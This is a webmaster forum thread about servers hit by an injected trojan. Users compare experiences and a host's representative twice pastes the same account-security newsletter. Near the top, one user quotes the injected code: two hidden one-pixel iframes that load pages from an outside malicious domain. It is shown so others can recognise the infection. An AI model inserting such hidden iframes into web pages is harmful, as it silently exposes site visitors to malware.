am i the only one thats getting this virus/trojan on my server?

[tehHinjew]

seems im not alone
found this when scottybuzz said my site had a virus

Quote:

<iframe src='http://prevedtraf.biz/adv/167/new.php' width=1 height=1></iframe>
<iframe src='http://prevedtraf.biz/adv/new.php?adv=167' width=1 height=1></iframe>

im on the phone with webair to see wagwaning


like i said im not alone

edit i cant show forums can i

[King of Queens]

that sucks

[tehHinjew]

fuck i cant show the link im scared to get banned

[interracialtoons]

Quote:

Originally Posted by tehHinjew

fuck i cant show the link im scared to get banned

Just copy/paste the text here.

[tehHinjew]

http://www.google.ca/search?source=i...e+Search&meta=

click on comus thumbs

[interracialtoons]

Quote:

Originally Posted by tehHinjew

http://www.google.ca/search?source=i...e+Search&meta=

click on comus thumbs

Er....fuck you.

[Aric]

Before I clicked on this thread - I already knew what it was about - and where you hosted. These threads are becoming more frequent here.

Sooner or later, Webair techs are going to have to isolate the vulnerability in their setup instead of blaming it on client scripts.

I've witnessed this first hand, on completely different accounts - no scripts in common... in fact, one was virtually a vanilla server.

Good luck!

[tehHinjew]

Quote:

Originally Posted by Aric

Before I clicked on this thread - I already knew what it was about - and where you hosted. These threads are becoming more frequent here.

Sooner or later, Webair techs are going to have to isolate the vulnerability in their setup instead of blaming it on client scripts.

I've witnessed this first hand, on completely different accounts - no scripts in common... in fact, one was virtually a vanilla server.

Good luck!

wow thats fucked up
can you show me other threads please?

[Aric]

Quote:

Originally Posted by tehHinjew

can you show me other threads please?

If the search here would work - I would.

I'm not here to bash Webair - just relaying my first hand experience as well as observations on the boards.

The last thread relating to this was someone telling morefuckingmoney.com to stop installing trojans from their webmaster page if you feel like searching.

[webair]

Looks like you have a vulnerable script...contact us and we will help you isolate it and upgrade it accordingly. If you do not regularly update the scripts you use of curse you will have issues.

This security notice goes out in our newsletter monthly (see below). Additionally, there is an upgrade security feature in our control panel that will help guard against vulnerable scripts. Please contact [email protected] or call us 1.866.WEBAIR1 to get your issue resolved if you need further information.



Dear Webair Client,



Your account security is of the utmost importance. As such, we want to equip our customers with the knowledge they need to ultimately ensure their account information remain safely in the right hands. We recommend that everyone visit this page and follow the helpful tips to ensure that their accounts remain secure.



The vast majority of account compromises originate from one of three sources:



1. Insecure scripts and coding

2. Downloading Viruses & Executables

3. Sharing account information



See below in this page for more information on keeping yourself safe.





KEEPING YOUR SYSTEM UP TO DATE



Please be sure that you have the most secure operating system environment on your computer by running Windows Update (if you own a Windows-based PC) or Software Update (if you own a Mac) and installing all of the updates marked "High Priority". Note: you may have to run the updater more than once to ensure you have all the high priority updates; many of the patches require a system restart, and then additional patch installations to complete the process.


INSECURE SCRIPTS AND CODING



It's extremely important to keep your website software up to date. Outdated software is likely to have bugs which can give a hacker access to your website. If your software is no longer maintained, we strongly advise that you select new software that is regularly updated.



If your software vendor operates a mailing list, it's a good idea to be subscribed and stay informed. Security issues are typically announced along with a new version of the software to address the problem



DOWNLOADING VIRUSUS & EXECUTABLES



Viruses, 'Trojan' applications, and key-logging software can all steal your login information, in addition to anything else on your computer once it has been compromised. These sorts of threats are typically brought into the system and installed by "executable" programs.



An "executable" program is something you download and then you run it as its own program - as opposed to opening a file or a folder. You can tell if a program is an executable if its file name ends in EXE. You can also right-click the file and choose "Properties." If the "File Type" says "Application," then that file is an executable.

Hackers and account thieves like to put their viruses, keyloggers, etc into executable files.


GIVING OUT ACCOUNT INFORMATION



Sadly, our support teams take a considerable number of inquiries from people who have lost their account solely because they at one time shared their password to a friend, spouse (or ex-spouse), roommate, relative, etc, and then had their account stolen.



Most of the small-scale account thefts (those not done by a widespread hack or scam) take place because the individual *gives out* their own information to someone they believed they could trust.



Your password is supposed to be yours and YOURS alone... this is part of why our Terms of Use specifically forbid sharing your login information.



Sharing account information is unwise and can wind up costing you everything you have worked for.


MAKING A SECURE PASSWORD


Creating a secure password can help immensely when facing certain types of security risks. Even if you believe your password has been kept secret it is best to follow some guidelines to make sure it is difficult to guess.

Suggestions on how to create a secure password:

Extreme care should be taken in choosing your password. If your password is easy to guess, someone may be able to access or steal your account

There are also a number of "Brute Force" programs which are used to generate password possibilities based on a set of words. These programs will then attempt to log onto an account with as many different passwords as possible, hoping that it will eventually "guess" the account password so that it can logon successfully

Below is a list of password creation suggestions that will reduce the effectiveness of these programs.

You can also contact [email protected] for pricing information on ProxyPass password protection addon for you account.


Password Creation Suggestions

Make sure your password does not contain words from ANY dictionary (forwards or backwards) - Most "Brute Force" programs use a list of common words and terms which they use to generate a list of possible passwords.
Commonly, dictionaries from multiple languages and technical terms are used.

Use letters, numbers, AND symbols - Simply adding a string of numbers at the end of the password is typically not enough to guarantee security. The use of number and symbols through-out the password will strengthen it against "Brute Force" programs.

Make your password at least 6 characters long - The longer the password, the more tries it takes to guess the password. Keeping your password over 6 characters will increase the difficulty in guessing your password.

Avoid common number/letter replacements. (i.e. 1 and I, 3 and e) -
Most "Brute Force" programs are aware of these replacements, and it uses them when creating a list of possible passwords to use.
Do not use any keyboard sequences (i.e. qwerty) - Keyboard strings are common in many passwords, and for this reason many "Brute Force" programs use them as well.

Do not use your own account name - Using your own account name in your password, even if it is followed by other words or numbers, increases the chance that a hacker can guess your password.

Avoid repeating small sequences of characters (i.e. abcabc) - Most
"Brute Force" programs have a list of common sequences that they use when trying to generate a list of possible passwords.


Computer Security

Keeping your account secure relies heavily on keeping your computer secure.
This can help keep your computer safe from malicious programs and those intent on stealing private information.



Useful Links

The following sites maintain lists of vulnerabilities for php scripts and more and are good to check often:


Http://blog.php-security.org/
http://www.securityfocus.com/vulnerabilities

[scottybuzz]

Hey tehhinjew. just have a chat with live support, theyre really helpful.


here is a previous example on my server

https://gfy.com/fucking-around-and-business-discussion/686691-warning-site-self-installing-trojan.html

it just kept coming back and back, u gotta delete the source.

[JD]

same shit's happening to me. 2 dif hosts neither are webair and neither are running the same OS or scripts

[pocketkangaroo]

Same thing happened to me today, I'm on Webair too.

[Tempest]

So can anyone actually tell us what the problem is? i.e. the security holes they're using so that we can fix our own servers instead of waiting for it to happen and dealing with it after the fact?

[pocketkangaroo]

I have no clue. They told me they were going to add some security measure and they fixed it. I'm crossing my fingers.

[pocketkangaroo]

Did this ever get fixed hinjew? It keeps popping up for me on Webair. My scripts are all secure too.

[Nookster]

You guys may want to shop for a new host as it's obvious they could care less about you.

[webair]

The solution lies in my prior post...If you read the post you will see that this is not a webair issue soley...we have a fix for our clients contact us if you are have been effected by this issue:

Looks like you have a vulnerable script...contact us and we will help you isolate it and upgrade it accordingly. If you do not regularly update the scripts you use of curse you will have issues.

This security notice goes out in our newsletter monthly (see below). Additionally, there is an upgrade security feature in our control panel that will help guard against vulnerable scripts. Please contact [email protected] or call us 1.866.WEBAIR1 to get your issue resolved if you need further information.

Dear Webair Client,

Your account security is of the utmost importance. As such, we want to equip our customers with the knowledge they need to ultimately ensure their account information remain safely in the right hands. We recommend that everyone visit this page and follow the helpful tips to ensure that their accounts remain secure.

The vast majority of account compromises originate from one of three sources:



1. Insecure scripts and coding

2. Downloading Viruses & Executables

3. Sharing account information



See below in this page for more information on keeping yourself safe.


KEEPING YOUR SYSTEM UP TO DATE



Please be sure that you have the most secure operating system environment on your computer by running Windows Update (if you own a Windows-based PC) or Software Update (if you own a Mac) and installing all of the updates marked "High Priority". Note: you may have to run the updater more than once to ensure you have all the high priority updates; many of the patches require a system restart, and then additional patch installations to complete the process.


INSECURE SCRIPTS AND CODING



It's extremely important to keep your website software up to date. Outdated software is likely to have bugs which can give a hacker access to your website. If your software is no longer maintained, we strongly advise that you select new software that is regularly updated.



If your software vendor operates a mailing list, it's a good idea to be subscribed and stay informed. Security issues are typically announced along with a new version of the software to address the problem



DOWNLOADING VIRUSUS & EXECUTABLES



Viruses, 'Trojan' applications, and key-logging software can all steal your login information, in addition to anything else on your computer once it has been compromised. These sorts of threats are typically brought into the system and installed by "executable" programs.



An "executable" program is something you download and then you run it as its own program - as opposed to opening a file or a folder. You can tell if a program is an executable if its file name ends in EXE. You can also right-click the file and choose "Properties." If the "File Type" says "Application," then that file is an executable.

Hackers and account thieves like to put their viruses, keyloggers, etc into executable files.


GIVING OUT ACCOUNT INFORMATION



Sadly, our support teams take a considerable number of inquiries from people who have lost their account solely because they at one time shared their password to a friend, spouse (or ex-spouse), roommate, relative, etc, and then had their account stolen.



Most of the small-scale account thefts (those not done by a widespread hack or scam) take place because the individual *gives out* their own information to someone they believed they could trust.



Your password is supposed to be yours and YOURS alone... this is part of why our Terms of Use specifically forbid sharing your login information.



Sharing account information is unwise and can wind up costing you everything you have worked for.


MAKING A SECURE PASSWORD


Creating a secure password can help immensely when facing certain types of security risks. Even if you believe your password has been kept secret it is best to follow some guidelines to make sure it is difficult to guess.

Suggestions on how to create a secure password:

Extreme care should be taken in choosing your password. If your password is easy to guess, someone may be able to access or steal your account

There are also a number of "Brute Force" programs which are used to generate password possibilities based on a set of words. These programs will then attempt to log onto an account with as many different passwords as possible, hoping that it will eventually "guess" the account password so that it can logon successfully

Below is a list of password creation suggestions that will reduce the effectiveness of these programs.

You can also contact [email protected] for pricing information on ProxyPass password protection addon for you account.


Password Creation Suggestions

Make sure your password does not contain words from ANY dictionary (forwards or backwards) - Most "Brute Force" programs use a list of common words and terms which they use to generate a list of possible passwords.
Commonly, dictionaries from multiple languages and technical terms are used.

Use letters, numbers, AND symbols - Simply adding a string of numbers at the end of the password is typically not enough to guarantee security. The use of number and symbols through-out the password will strengthen it against "Brute Force" programs.

Make your password at least 6 characters long - The longer the password, the more tries it takes to guess the password. Keeping your password over 6 characters will increase the difficulty in guessing your password.

Avoid common number/letter replacements. (i.e. 1 and I, 3 and e) -
Most "Brute Force" programs are aware of these replacements, and it uses them when creating a list of possible passwords to use.
Do not use any keyboard sequences (i.e. qwerty) - Keyboard strings are common in many passwords, and for this reason many "Brute Force" programs use them as well.

Do not use your own account name - Using your own account name in your password, even if it is followed by other words or numbers, increases the chance that a hacker can guess your password.

Avoid repeating small sequences of characters (i.e. abcabc) - Most
"Brute Force" programs have a list of common sequences that they use when trying to generate a list of possible passwords.


Computer Security

Keeping your account secure relies heavily on keeping your computer secure.
This can help keep your computer safe from malicious programs and those intent on stealing private information.



Useful Links

The following sites maintain lists of vulnerabilities for php scripts and more and are good to check often:


Http://blog.php-security.org/
http://www.securityfocus.com/vulnerabilities

[Sarah_Jayne]

I had that and they fixed it for me within minutes and added new security to help it stop happening and it hasn't happened since.

[Vendzilla]

Webair rocks!!